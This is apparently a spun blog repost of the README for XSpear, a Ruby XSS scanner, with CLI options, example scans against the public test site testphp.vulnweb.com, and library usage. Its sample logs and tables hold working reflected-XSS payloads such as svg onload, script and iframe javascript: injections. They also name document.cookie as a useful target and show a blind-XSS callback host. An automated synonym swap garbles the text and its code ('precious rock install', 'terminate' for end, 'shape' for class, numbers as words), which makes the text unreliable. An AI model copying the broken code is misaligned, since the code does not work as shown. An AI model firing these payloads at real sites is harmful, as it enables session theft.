Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool - Hi friends mederc, In the article that you read this time with the title Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool, We have prepared this article well for you to read and retrieve information from it. hopefully fill the posts Article Bugbounty, Article Linux, Article Reflected XSS, Article Ruby, Article Scanner, Article Scanning, Article Scanning XSS, Article Selenium, Article Static Analysis, Article Vulnerable, Article XSpear, Article XSS, Article XSS scanner, Article ZAP, we write this you can understand. Alright, happy reading.

Title : Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool

link : Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool

Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool

XSpear is XSS Scanner on ruby gems.

Key features

• Pattern matching based XSS scanning
• Detect alert confirm prompt lawsuit on headless browser (with Selenium)
• Testing request/response for XSS protection bypass together with reflected params
  
  • Reflected Params
  • Filtered exam event handler HTML tag Special Char
• Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base of operations blind test...)
• Dynamic/Static Analysis
  • Find SQL Error pattern
  • Analysis Security headers(CSP HSTS X-frame-options, XSS-protection etc.. )
  • Analysis Other headers..(Server version, Content-Type, etc...)
• Scanning from Raw file(Burp suite, ZAP Request)
• XSpear running on ruby code(with Gem library)
• Show table base of operations cli-report together with filtered rule, testing raw query(url)
• Testing at selected parameters
• Support output format cli json
  • cli: summary, filtered rule(params), Raw Query
• Support Verbose degree (quit / nomal / raw data)
• Support custom callback code to whatever exam diverse assail vectors

Installation
Install it yourself as:

$ precious rock install XSpear

Or install it yourself every bit (local file):

$ precious rock install XSpear-{version}.gem

Add this trouble to your application's Gemfile:

gem 'XSpear'

And thus execute:

$ bundle

Dependency gems
colorize selenium-webdriver terminal-table
If y'all configured it to install automatically inward the Gem library, only it behaves abnormally, install it amongst the next command.

$ precious rock install colorize $ precious rock install selenium-webdriver $ precious rock install terminal-table

Usage on cli

Usage: xspear -u [target] -[options] [value] [ e.g ] $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'  [ Options ]     -u, --url=target_URL             [required] Target Url     -d, --data=POST Body             [optional] POST Method Body information         --headers=HEADERS            [optional] Add HTTP Headers         --cookie=COOKIE              [optional] Add Cookie         --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)     -p, --param=PARAM                [optional] Test paramters     -b, --BLIND=URL                  [optional] Add vector of Blind XSS                                       + amongst XSS Hunter, ezXSS, HBXSS, etc...                                       + e.g : -b https://hahwul.xss.ht     -t, --threads=NUMBER             [optional] thread , default: 10     -o, --output=FILENAME            [optional] Save JSON Result     -v, --verbose=1 iii                   [optional] Show log depth                                       + Default value: two                                       + v=1 : quite trend                                       + v=2 : present scanning log                                       + v=3 : present especial log(req/res)     -h, --help                       Prints this assistance         --version                    Show XSpear version         --update                     Update amongst online 

Result types

• (I)NFO: Get information ( e.g sql mistake , filterd rule, reflected params, etc..)
• (V)UNL: Vulnerable XSS, Checked alert/prompt/confirm amongst Selenium
• (L)OW: Low degree issue
• (M)EDIUM: medium degree issue
• (H)IGH: high degree issue

Case yesteryear Case
Scanning XSS

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"

json output

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1

detail log

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3

set thread

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30

testing at selected parameters

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test

testing blind xss

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"

etc...

Sample log
Scanning XSS

xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"     )  (  ( /(  )\ )  )\())(()/(          (     )  ( ((_)\  /(_))`  )    ))\ ( /(  )( __((_)(_))  /(/(   /((_))(_))(()\ \ \/ // __|((_)_\ (_)) ((_)_  ((_)  >  < \__ \| '_ \)/ -_)/ _` || '_| /_/\_\|___/| .__/ \___|\__,_||_|    />            |_|                   \ /< {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-                                  / \<                                     \>       [ v1.0.7 ] [*] creating a exam query. [*] exam enquiry generation is complete. [149 query] [*] starting exam together with analysis. [10 threads] [I] [00:37:34] reflected 'XsPeaR [-] [00:37:34] 'cat' Not reflected |XsPeaR [I] [00:37:34] [param: cat][Found SQL Error Pattern] [-] [00:37:34] 'STATIC' non reflected [I] [00:37:34] reflected "XsPeaR [-] [00:37:34] 'cat' Not reflected ;XsPeaR [I] [00:37:34] reflected    `XsPeaR ...snip... [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code] [-] [00:37:44] 'cat' non reflected <img/src onerror=alert(45)> [-] [00:37:44] 'cat' non reflected <svg/onload=alert(45)> [-] [00:37:49] 'cat' non institute alert/prompt/confirm lawsuit '"><svg/onload=alert(45)> [-] [00:37:49] 'cat' non institute alert/prompt/confirm lawsuit '"><svg/onload=alert(45)> [-] [00:37:50] 'cat' non institute alert/prompt/confirm lawsuit <xmp><p title="XSpear - Powerfull XSS Scanning And Parameter Analysis Tool"> [-] [00:37:51] 'cat' non institute alert/prompt/confirm lawsuit '"><svg/onload=alert(45)> [V] [00:37:51] institute alert/prompt/confirm (45) inward selenium!! <script>alert(45)</script>                => [param: cat][triggered <script>alert(45)</script>] [V] [00:37:51] institute alert/prompt/confirm (45) inward selenium!! '"><svg/onload=alert(45)>                   => [param: cat][triggered <svg/onload=alert(45)>] [*] goal scan. the study is existence generated.. +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+ |                                                         [ XSpear study ]                                                         | |                                         http://testphp.vulnweb.com/listproducts.php?cat=z                                         | |                              2019-07-24 00:37:33 +0900   2019-07-24 00:37:51 +0900 Found 12 issues.                               | +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+ | NO | TYPE  | ISSUE            | METHOD | PARAM | PAYLOAD                             | DESCRIPTION                                | +----+-------+------------------+--------+----   ---+-------------------------------------+--------------------------------------------+ | 0  | INFO  | DYNAMIC ANALYSIS | GET    | truthful cat   | XsPeaR"                             | Found SQL Error Pattern                    | | 1  | INFO  | STATIC ANALYSIS  | GET    | -     | original enquiry                      | Found Server: nginx/1.4.1                  | | two  | INFO  | STATIC ANALYSIS  | GET    | -     | original enquiry                      | Not fix HSTS                               | | iii  | INFO  | STATIC ANALYSIS  | GET    | -     | original enquiry                      | Content-Type: text/html                    | | four  | LOW   | STATIC ANALYSIS  | GET    | -     | original enquiry                      | Not Set X-Frame-Options                    | | five  | MIDUM | STATIC ANALYSIS  | GET    | -     | original enquiry                      | Not Set CSP                                | | six  | INFO  | REFLECTED        | GET    | truthful cat   | rEfe6                                  | reflected parameter                        | | seven  | INFO  | FILERD RULE      | GET    | truthful cat   | onhwul=64                           | non filtered lawsuit handler on{any} blueprint | | 8  | HIGH  | XSS              | GET    | truthful cat   | <script>alert(45)</script>          | reflected XSS Code                         | | ix  | HIGH  | XSS              | GET    | truthful cat   | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code                         | | 10 | VULN  | XSS              | GET    | truthful cat   | <script>alert(45)</script>          | triggered <script>alert(45)</script>       | | xi | VULN  | XSS              | GET    | truthful cat   | '"><svg/onload=alert(45)>           | triggered <svg/onload=alert(45)>           | +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+ < Available Objects > [cat] param     + Available Special Char: ' \ ` ) [ } : . { ] $  + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange   ","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"  + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"  + Available Useful Code: "document.cookie","document.location","window.location" < Raw Query > [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22 [1] http://testphp.vulnweb.com/listproducts.php?cat=z?- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?- [3] http://testphp.vulnweb.com/listproducts.p   hp?cat=z?- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6 [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E

to JSON

$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1 {"starttime":"2019-07-17 01:02:13 +0900","endtime":"2019-07-17 01:02:59 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yy%3CXsPeaR","description":"not filtered \u001b[0;34;49m<\u001b[0m"},{"id":1,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%27","description":"not filtered \u001b[0;34;49m'\u001b[0m"},{"id":2,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3E","description":"not filtered \u001b[0;34;49m>\u001b[0m"},{"id":3,"type":"INFO","issue":"REFLECTED","payload":"searchFor=yyrEfe6","description":"reflected parameter"},{"id":4,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%22","description":"not filtered \u001b[0;34;49m\"\u001b[0m"},{"id":5,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%60","description":"not filtered \u001b[0;34;49m`\u001   b[0m"},{"id":6,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3B","description":"not filtered \u001b[0;34;49m;\u001b[0m"},{"id":7,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%28","description":"not filtered \u001b[0;34;49m(\u001b[0m"},{"id":8,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7C","description":"not filtered \u001b[0;34;49m|\u001b[0m"},{"id":9,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%29","description":"not filtered \u001b[0;34;49m)\u001b[0m"},{"id":10,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7B","description":"not filtered \u001b[0;34;49m{\u001b[0m"},{"id":11,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5B","description":"not filtered \u001b[0;34;49m[\u001b[0m"},{"id":12,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5D","description":"not filtered \u001b[0;34;49m]\u001b[0m"},{"id":13,"type":"INFO","issue":"FILERD RULE","pay   load":"searchFor=yyXsPeaR%7D","description":"not filtered \u001b[0;34;49m}\u001b[0m"},{"id":14,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3A","description":"not filtered \u001b[0;34;49m:\u001b[0m"},{"id":15,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2B","description":"not filtered \u001b[0;34;49m+\u001b[0m"},{"id":16,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR.","description":"not filtered \u001b[0;34;49m.\u001b[0m"},{"id":17,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR-","description":"not filtered \u001b[0;34;49m-\u001b[0m"},{"id":18,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2C","description":"not filtered \u001b[0;34;49m,\u001b[0m"},{"id":19,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3D","description":"not filtered \u001b[0;34;49m=\u001b[0m"},{"id":20,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Cimg%2Fsrc+onerror%3Dalert%2845%29%3E","des   cription":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":21,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Csvg%2Fonload%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":22,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":23,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%24","description":"not filtered \u001b[0;34;49m$\u001b[0m"}]}

Usage on ruby code (gem library)

require 'XSPear'  # Set options options = {} options['thread'] = thirty options['cookie'] = "data=123" options['blind'] = "https://hahwul.xss.ht" options['output'] = json  # Create XSpear object amongst url, options sec = XspearScan.new "https://www.hahwul.com?target_url", options  # Scanning s.run lawsuit = s.report.to_json r = JSON.parse result

Add Scanning Module
1) Add makeQueryPattern

makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback funcion") # type: f(ilterd?) r(eflected?) x(ss?) # category i(nfo) v(uln) l(ow) m(edium) h(igh)   # e.g  # makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)

2) if other callback, write callback shape override ScanCallbackFunc e.g

  shape CallbackStringMatch < ScanCallbackFunc     def run       if @response.body.include? @query         [true, "reflected #{@query}"]       else         [false, "not reflected #{@query}"]       terminate     terminate   end

Parent class(ScanCallbackFunc)

class ScanCallbackFunc()     def initialize(url, method, query, response)       @url = url       @method = method       @query = enquiry       @response = answer       # self.run     terminate          def run       # override     terminate end

Common Callback Class

• CallbackXSSSelenium
• CallbackErrorPatternMatch
• CallbackCheckHeaders
• CallbackStringMatch
• CallbackNotAdded etc...

Update
if nomal user

$ precious rock update XSpear

if developers (soft)

$ git trace -v

if develpers (hard)

$ git reset --hard HEAD; git trace -v

Development
After checking out the repo, run bin/setup to install dependencies. Then, run rake spec to run the tests. You tin besides run bin/console for an interactive prompt that volition allow y'all to experiment.
To install this precious rock onto your local machine, run bundle exec rake install. To liberate a novel version, update the version number inward version.rb, together with thus run bundle exec rake release, which volition create a git tag for the version, force git commits together with tags, together with force the .gem file to rubygems.org.

Contributing
Bug reports together with trace requests are welcome on GitHub at https://github.com/hahwul/XSpear. This projection is intended to travel a safe, welcoming infinite for collaboration, together with contributors are expected to adhere to the Contributor Covenant code of conduct.

Code of Conduct
Everyone interacting inward the XSpear project’s codebases, number trackers, chat rooms together with mailing lists is expected to follow the code of conduct.

ScreenShot

Download XSpear

Thus the article Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool

That's all the article Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool this time, hopefully can benefit you all. okay, see you in another article posting.

You are now reading the article Xspear - Powerfull Xss Scanning As Well As Parameter Analysis Tool with the link address https://mederc.blogspot.com/2013/05/xspear-powerfull-xss-scanning-as-well.html

Share this post